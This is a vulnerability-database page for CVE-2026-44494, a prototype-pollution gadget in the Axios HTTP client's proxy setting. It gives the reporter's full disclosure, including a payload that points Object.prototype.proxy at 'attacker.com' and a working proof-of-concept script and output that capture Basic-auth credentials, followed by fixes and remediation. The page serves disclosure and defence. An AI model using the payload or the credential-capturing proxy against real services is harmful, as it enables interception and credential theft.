Skip to main content

Axios CVE-2026-44494

| EUVDEUVD-2026-36257 HIGH
Unintended Proxy or Intermediary ('Confused Deputy') (CWE-441)
2026-05-29 https://github.com/axios/axios GHSA-35jp-ww65-95wh
8.7
CVSS 3.1 · Vendor: https://github.com/axios/axios
Share

Severity by source

Vendor (https://github.com/axios/axios) PRIMARY
8.7 HIGH
AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
Red Hat
8.7 HIGH
qualitative

Primary rating from Vendor (https://github.com/axios/axios).

CVSS VectorVendor: https://github.com/axios/axios

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
May 29, 2026 - 16:50 vuln.today
Analysis Generated
May 29, 2026 - 16:50 vuln.today
CVE Published
May 29, 2026 - 16:04 nvd
HIGH 8.7

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 273 npm packages depend on axios (189 direct, 84 indirect)

Ecosystem-wide dependent count for version 1.0.0.

DescriptionCVE.org

Vulnerability Disclosure: Full Man-in-the-Middle via Prototype Pollution Gadget in config.proxy

Summary

The Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack - intercepting, reading, and modifying all HTTP traffic including authentication credentials.

The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server.

Unlike the transformResponse gadget (which is constrained by assertOptions to return true), the proxy gadget has zero constraints - the attacker gets a full MITM position with the ability to read all credentials and tamper with all responses.

Severity: Critical (CVSS 9.4) Affected Versions: All versions (v0.x - v1.x including v1.15.0) Vulnerable Component: lib/adapters/http.js (config property access on merged object)

CWE

  • CWE-1321: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
  • CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')

CVSS 3.1

Score: 9.4 (Critical)

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

MetricValueJustification
Attack VectorNetworkPP is triggered remotely via any vulnerable dependency
Attack ComplexityLowOnce PP exists, single property assignment: Object.prototype.proxy = {host:'attacker', port:8080}. Consistent with GHSA-fvcv-3m26-pcqx scoring methodology
Privileges RequiredNoneNo authentication needed
User InteractionNoneNo user interaction required
ScopeUnchangedMITM within the application's network context
ConfidentialityHighAttacker sees ALL request data: Authorization headers, auth credentials, cookies, request bodies, full URLs (including internal hostnames)
IntegrityHighAttacker can modify ALL responses: inject malicious data, alter API results, redirect authentication flows. No constraints - unlike transformResponse which must return true
AvailabilityLowAttacker could drop requests or return errors, but this is secondary to C/I impact

Why This Bypasses mergeConfig

The critical difference from transformResponse: the proxy property is not in defaults (lib/defaults/index.js does not set proxy). This means:

  1. mergeConfig iterates Object.keys({...defaults, ...userConfig}) - proxy is NOT in this set
  2. defaultToConfig2 for proxy is never called
  3. The merged config has no own proxy property
  4. When http.js:670 reads config.proxy, JavaScript traverses the prototype chain
  5. Object.prototype.proxy is found → used by setProxy()

This is a more direct attack path than transformResponse because it doesn't even go through mergeConfig's merge logic - it completely bypasses it.

Usage of "Helper" Vulnerabilities

This vulnerability requires Zero Direct User Input.

If an attacker can pollute Object.prototype via any other library in the stack (e.g., qs, minimist, lodash, body-parser), Axios will automatically use the polluted proxy value when making HTTP requests. The developer's code is completely safe - no configuration errors needed.

Proof of Concept

1. The Setup (Simulated Pollution)

Imagine a scenario where a known prototype pollution vulnerability exists in a query parser. The attacker sends a payload that sets:

javascript
Object.prototype.proxy = {
  host: 'attacker.com',
  port: 8080,
  protocol: 'http',
};

2. The Gadget Trigger (Safe Code)

The application makes a completely safe, hardcoded request:

javascript
// This looks safe to the developer - no proxy configured
const response = await axios.get('https://api.internal.corp/secrets', {
  auth: { username: 'svc-account', password: 'prod-key-abc123!' }
});

3. The Execution

At http.js:668-670:

javascript
setProxy(
  options,
  config.proxy,    // ← traverses prototype chain → finds polluted proxy
  protocol + '//' + parsed.hostname + (parsed.port ? ':' + parsed.port : '') + options.path
);

setProxy() at http.js:191-239 then:

javascript
function setProxy(options, configProxy, location) {
  let proxy = configProxy;    // = { host: 'attacker.com', port: 8080 }
  // ...
  if (proxy) {
    options.hostname = proxy.hostname || proxy.host;  // → 'attacker.com'
    options.port = proxy.port;                         // → 8080
    options.path = location;                           // → full URL as path
    // ...
  }
}

4. The Impact (Full MITM)

The attacker's proxy server receives:

http
GET http://api.internal.corp/secrets HTTP/1.1
Host: api.internal.corp
Authorization: Basic c3ZjLWFjY291bnQ6cHJvZC1rZXktYWJjMTIzIQ==
User-Agent: axios/1.15.0
Accept: application/json, text/plain, */*

The Authorization header contains svc-account:prod-key-abc123! in Base64. The attacker:

  • Sees every request URL, header, and body
  • Modifies every response (inject malicious data, change auth results)
  • Logs all API keys, session tokens, and passwords
  • Operates as an invisible proxy - the developer has no indication

5. Verified PoC Code

javascript
import http from 'http';
import axios from './index.js';

// Attacker's proxy server
const intercepted = [];
const proxyServer = http.createServer((req, res) => {
  intercepted.push({
    url: req.url,
    authorization: req.headers.authorization,
    headers: req.headers,
  });
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end('{"hijacked":true}');
});
await new Promise(r => proxyServer.listen(0, r));
const proxyPort = proxyServer.address().port;

// Real target server
const realServer = http.createServer((req, res) => {
  res.writeHead(200);
  res.end('{"data":"real"}');
});
await new Promise(r => realServer.listen(0, r));
const realPort = realServer.address().port;

// Prototype pollution
Object.prototype.proxy = { host: '127.0.0.1', port: proxyPort, protocol: 'http' };

// "Safe" request - goes through attacker's proxy
const resp = await axios.get(`http://127.0.0.1:${realPort}/api/secrets`, {
  auth: { username: 'admin', password: 'SuperSecret123!' }
});

console.log('Response from:', resp.data.hijacked ? 'ATTACKER PROXY' : 'real server');
console.log('Intercepted Authorization:', intercepted[0]?.authorization);
// Output: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh (= admin:SuperSecret123!)

delete Object.prototype.proxy;
realServer.close();
proxyServer.close();

Verified PoC Output

[1] Normal request (before pollution):
    Response source: real server
    response.data: {"data":"from-real-server"}
    Proxy intercept count: 0

[2] Prototype Pollution: Object.prototype.proxy
    Set: Object.prototype.proxy = { host: "127.0.0.1", port: 50879 }

[3] Request after pollution (same code, same URL):
    Response source: ATTACKER PROXY!
    response.data: {"data":"from-attacker-proxy","hijacked":true}

[4] Data intercepted by attacker's proxy:
    Full URL: http://127.0.0.1:50878/api/secrets
    Host: 127.0.0.1:50878
    Authorization: Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh
    All headers: {
      "accept": "application/json, text/plain, */*",
      "user-agent": "axios/1.15.0",
      "accept-encoding": "gzip, compress, deflate, br",
      "host": "127.0.0.1:50878",
      "authorization": "Basic YWRtaW46U3VwZXJTZWNyZXQxMjMh",
      "connection": "keep-alive"
    }

[5] Attacker capabilities demonstrated:
    ✓ Full URL visible (including internal hostnames)
    ✓ Authorization header visible (Base64-encoded credentials)
    ✓ Can modify/forge response data
    ✓ Affects ALL axios HTTP requests (not just a single instance)
    ✓ No assertOptions constraints (unlike transformResponse gadget)

Impact Analysis

  • Full Credential Interception: Every HTTP request's Authorization header, cookies, API keys, and request bodies are visible to the attacker's proxy in plaintext.
  • Arbitrary Response Tampering: The attacker can return any response data - no constraints like transformResponse's "must return true".
  • Internal Network Reconnaissance: The proxy sees all request URLs, revealing internal hostnames, ports, and API paths.
  • Universal Scope: Affects every axios HTTP request in the application, including all third-party libraries that use axios.
  • Invisible Attack: The developer has no indication that a proxy has been injected - requests complete normally with attacker-controlled responses.
  • Bypass of 1.15.0 Fix: The header sanitization patch in v1.15.0 (GHSA-fvcv-3m26-pcqx) does NOT address this vector.

Why This Is More Severe Than transformResponse (axios_26)

DimensiontransformResponse Gadgetproxy Gadget
Data accessthis.auth + response dataAll headers, auth, body, URL, response
Response controlMust return trueArbitrary responses
Attack visibilityResponse becomes true (suspicious)Normal-looking responses (invisible)
mergeConfig involvementGoes through defaultToConfig2Bypasses mergeConfig entirely

Recommended Fix

Fix 1: Use hasOwnProperty when reading security-sensitive config properties

javascript
// In lib/adapters/http.js
const proxy = Object.prototype.hasOwnProperty.call(config, 'proxy') ? config.proxy : undefined;
setProxy(options, proxy, location);

Fix 2: Enumerate all properties not in defaults and apply hasOwnProperty

Properties not in defaults that are read by http.js and have security impact:

  • config.proxy - MITM
  • config.socketPath - Unix socket SSRF
  • config.transport - request hijack
  • config.lookup - DNS hijack
  • config.beforeRedirect - redirect manipulation
  • config.httpAgent / config.httpsAgent - agent injection

All should use hasOwnProperty checks.

Fix 3: Use null-prototype object for merged config

javascript
// In lib/core/mergeConfig.js
const config = Object.create(null);

Resources

Timeline

DateEvent
2026-04-16Vulnerability discovered during source code audit
2026-04-16PoC developed and verified - full MITM confirmed
TBDReport submitted to vendor via GitHub Security Advisory

AnalysisAI

Man-in-the-middle interception in the Axios HTTP client library (all versions through 1.15.x) allows any prototype pollution elsewhere in the Node.js dependency tree to be escalated into full traffic hijacking. Because config.proxy is not defined in Axios defaults, lib/adapters/http.js reads it via prototype-chain traversal - letting an attacker who controls Object.prototype.proxy silently route every outbound HTTPS/HTTP request through their server, harvesting Authorization headers, cookies, and request bodies while tampering with responses. Publicly available exploit code exists in the disclosure; no public exploit identified at time of analysis in the wild and not on CISA KEV.

Technical ContextAI

Axios is one of the most widely deployed npm HTTP clients (tens of millions of weekly downloads), used directly and transitively by countless Node.js services. The root cause combines CWE-1321 (Prototype Pollution) with CWE-441 (Unintended Proxy / Confused Deputy): the merged request config object inherits from Object.prototype, and the Node HTTP adapter dereferences config.proxy with a bare property read at lib/adapters/http.js:670. Because proxy is intentionally absent from lib/defaults/index.js, mergeConfig never copies it as an own property, so any value placed on Object.prototype.proxy is transparently picked up by setProxy() and used to rewrite options.hostname, options.port, and options.path. This is a distinct gadget from the earlier transformResponse issue (GHSA-fvcv-3m26-pcqx, fixed in 1.15.0), which the 1.15.0 header-sanitization patch does not mitigate. Affected CPE is pkg:npm/axios.

RemediationAI

Vendor-released patch: upgrade Axios to 1.16.0 or later, per the GHSA-35jp-ww65-95wh advisory at https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh. Because exploitation requires a separate prototype-pollution sink, also audit and update transitive dependencies known for PP issues (qs, minimist, lodash, body-parser) and enable lockfile scanners such as npm audit or Snyk. If upgrading immediately is not feasible, the reporter's suggested compensating controls are to harden Axios's merged config by freezing Object.prototype at process start with Object.freeze(Object.prototype) (side effect: breaks any library that legitimately writes to the prototype), or to monkey-patch the adapter to read proxy with Object.prototype.hasOwnProperty.call(config, 'proxy') before passing it to setProxy(). As a network-layer mitigation, egress firewall rules that restrict outbound destinations to a known allowlist will blunt MITM redirection to attacker-controlled hosts but will not prevent SSRF-style abuse to internal services.

Vendor StatusVendor

Share

CVE-2026-44494 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy